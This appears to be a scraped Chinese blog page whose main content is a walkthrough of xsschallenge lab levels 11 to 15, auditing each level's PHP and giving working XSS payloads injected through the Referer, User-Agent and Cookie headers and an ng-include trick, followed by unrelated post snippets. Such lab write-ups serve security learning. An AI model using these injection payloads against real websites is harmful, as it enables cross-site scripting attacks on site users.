当前位置：首页 > news >正文

xsschallenge通关（11-15）

news 2026/2/7 17:43:32

level 11

老规矩，先查看源码，做代码审计：

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

发现他对关键词、特殊符号都做了过滤，还$str11接收了一个HTTP头部的referer字段，并且输出时没有做处理，用双引号闭合，于是可以对referer进行注入，用bp抓包，然后修改referer字段：

"type="text" οnmouseover="alert(/xss/)

如图：

在这里插入图片描述

修改成功后发包，但是没有事件发生，查看源码后发现小写o被转义：

在这里插入图片描述

重新抓包，将小写o改成大写O，当移动鼠标的事件发生时出现弹窗，通关：

在这里插入图片描述

level 12

查看源代码，做代码审计：

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php

发现这关和第十一关类似，也需要抓包，不过将HTTP头部的字段换成了user-agent。

抓包后修改user-agent字段，将o改成大写：

"type="text" Onmouseover="alert(/xss/)

如图：

在这里插入图片描述

放包后通关成功：

在这里插入图片描述

level 13

做代码审计：

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

发现这一关需要修改cookie字段，步骤和前两关一样：

抓包，修改：

"type="text" Onmouseover="alert(/xss/)

如图：

在这里插入图片描述

放包后通关成功：

在这里插入图片描述

level 14

来到第十四关，什么也没有：

在这里插入图片描述

查看源码，也是没有东西：

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>欢迎来到level14</title>
</head>
<body>
<h1 align=center>欢迎来到level14</h1>
<center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center><center>这关成功后不会自动跳转。成功者<a href=/xsschallenge/level15.php?src=1.gif>点我进level15</a></center>
</body>
</html>

直接到十五关

level 15

第十五关只有一张图片：

在这里插入图片描述

查看源代码：

<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关，自己想个办法走出去吧！</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

发现它接收了一个参数src，并发现ng-include，ng-include的作用如下：

ng-include 指令用于包含外部的 HTML 文件。

ng-include可以作为一个属性，或者一个元素使用

这时候我们可以让这个网页包含一个有漏洞的外部php文件，如level1.php，用onerror事件

?src='level1.php?name=<img src=1 οnerrοr=alert(/xss/)>'

xsschallenge通关（11-15）

level 11 老规矩，先查看源码，做代码审计： <?php ini_set("display_errors", 0); $str $_GET["keyword"]; $str00 $_GET["t_sort"]; $str11$_SERVER[HTTP_REFERER]; $str22str_replace(">&quo…...

编程日记 2023/9/2 0:46:53

Kubernetes技术--k8s核心技术集群的安全机制RBAC

1.引入我们在访问k8s的集群的时候，需要经过一下几个步骤: -a:认证 -1）.传输安全:对外是不暴露端口:8080,只能够在内部访问，对外使用的是6443端口。 -2).客户端认证的常用几种方式: -https证书基于ca证书 -https token认证通过token识别用户 -https <...

编程日记 2023/9/2 0:45:52

【JavaSE】String类

两种创建String对象的区别 String s1 "hello"; String s2 new String("hello");s1是先查看常量池是否有 “hello” 数据空间，如果有就直接指向它，如果没有就创建然后指向它。s1最终指向的是常量池的空间地址。 s2是先在堆中创建空…...

编程日记 2023/9/2 0:44:51

参考文档： Database Administrator’s Guide 29.4.5.2 Using the Scheduler Calendaring Syntax The main way to set how often a job repeats is to set the repeat_interval attribute with a Scheduler calendaring expression. See Also: Oracle Database…...

编程日记 2023/9/2 0:43:50

windows的redis配置sentinel

1、先安装好redis主从，参考我的文章，链接如下 redis主从（windows版本）_rediswindows版本_veminhe的博客-CSDN博客 2、然后配置sentinel 参考在windows上搭建redis集群（Redis-Sentinel） 配置时&#xf…...

编程日记 2023/9/2 0:42:49

NetMarvel机器学习促广告收益最大化，加速获客

游戏出海的竞争日益激烈，这并非空穴来风。从2021年第一季度至2022年第四季度，iOS平台的CPI增长了88%，意味着厂商需要花费近两倍的钱才能获取一个新用户。与此同时数据隐私政策持续收紧，更加提高了营销成本。在成本高涨的当下&…...

编程日记 2023/9/2 0:41:48

Spring-5.0.x源码下载及本地环境搭建

一、Spring源码下载从github上下载Spring的源代码下载地址：https://github.com/spring-projects/spring-framework 访问地址之后，打开Spring的代码页面找到你想下载的版本，如5.0.x，如下图所示： 下载方式一&#x…...

编程日记 2023/9/2 0:40:46

go中的切片

demo1:切片定义的几种方式 package mainimport "fmt"/* 切片定义的几种方式数组和切片区别： 使用数组传参是值传递，而使用切片传参是引用传递数组定义好长度之后不可修改，而切片可以理解为动态数组，长度可修改*/func …...

编程日记 2023/9/2 0:39:45

C++笔记之单例通过GetInstance传递参数

C笔记之单例通过GetInstance传递参数 code review! 文章目录 C笔记之单例通过GetInstance传递参数例1.普通指针的单例例2.结合智能指针和std::call_once例3.编译不通过的错误例子，在GetInstance内不可以使用std::make_shared来创建对象例1.普通指针的单例运行 …...

编程日记 2023/9/2 0:38:42

1688API技术解析，实现获得1688商品详情

要实现获得1688商品详情，你需要使用1688 API。1688 API是阿里巴巴旗下的开放平台，它提供了一套丰富的接口，可以让开发者通过编程的方式获取到1688网站上的商品信息。首先，你需要在阿里开放平台注册一个账号，并创建一…...

编程日记 2023/9/2 0:37:42

【Java 动态数据统计图】动态X轴二级数据统计图思路Demo（动态，排序，动态数组（重点推荐：难）九（131）

需求： 1.有一组数据集合，数据集合中的数据为动态； 举例如下： [{province陕西省, city西安市}, {province陕西省, city咸阳市}, {province陕西省, city宝鸡市}, {province陕西省, city延安市}, {province陕西省, city汉中市}, {pr…...

编程日记 2023/9/2 0:36:39

C#将text文本中的单双行分开单独保存

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录文本的分割1.设定text文件的名称为02.文本导出文本的分割 1.设定text文件的名称为0 代码如下： using System; using System.Collections.Generic; us…...

编程日记 2023/9/2 0:35:38

深入理解 Go 语言中的 iota

iota是go语言的常量计数器，只能在常量表达式中使用，iota在const关键字出现时将被重置为0，const中每新增一行常量声明将使iota计数一次，可理解为const语句块中的行索引。它会自动递增，从0开始。修改步长尽管默认步长…...

编程日记 2023/9/2 0:34:37

【力扣】55、跳跃游戏

var canJump function(nums){let cover 0;for(let i0;i<nums.length;i){if(i<cover){cover Math.max(nums[i]i,cover);if(cover >nums.length-1){return true;}}}}...

编程日记 2023/9/2 0:33:35

个人与公司合作，怎么代开发票？有哪些优惠政策？

《梅梅谈税》专注于企业税务筹划！助力企业合理、合规、合法进行节税税收筹划！ 当下越来越多的个人与公司直接发生业务往来，例如个人给企业提供技术服务，做宣传推广等，业务完成公司给个人支付了相关费用后，…...

编程日记 2023/9/2 0:32:34

什么是计算机视觉,计算机视觉的主要任务及应用

目录 1. 什么是计算机视觉 2. 计算机视觉的主要任务及应用 2.1 图像分类 2.1.1 图像分类的主要流程 2.2 目标检测 2.2.1 目标检测的主要流程 2.3 图像分割 2.3.1 图像分割的主要流程 2.4 人脸识别 2.4.1 人脸识别的主要流程对于我们人类来说，要想认出身边…...

编程日记 2023/9/2 0:31:33

网易24届内推

【网易】2024届网易互联网秋季校园招聘内推开始啦！给你分享我的专属内推邀请函：https://bole.campus.163.com/campus/home?projectId55&type99&isShare1&boleId7b842acc7c2b42db&boleType2&signatured5f2a3dc23bed70777a8be1a14b49…...

编程日记 2023/9/2 0:30:32

redis 应用 4： HyperLogLog

我们先思考一个常见的业务问题：如果你负责开发维护一个大型的网站，有一天老板找产品经理要网站每个网页每天的 UV 数据，然后让你来开发这个统计模块，你会如何实现？ img 如果统计 PV 那非常好办，给每个网页一…...

编程日记 2023/9/2 0:29:31

进程的挂起状态

进程的挂起状态详解当我们谈论操作系统和进程管理时，我们经常听到进程的各种状态，如“就绪”、“运行”和“阻塞”。但其中一个不那么常被提及，但同样重要的状态是“挂起”状态。本文将深入探讨挂起状态，以及为什么和在何时进程…...

编程日记 2023/9/2 0:28:30

idea 链接mysql连不上

打开文件 C:\Program Files\JetBrains\IntelliJ IDEA 2023.2.1\jbr\conf\security\java.security修改内容搜索：jdk.tls.disabledAlgorithms 修改链接地址在链接后面添加 ?useSSLfalse jdbc:mysql://127.0.0.1:3306/db_admin3?useSSLfalse...

编程日记 2023/9/2 0:27:29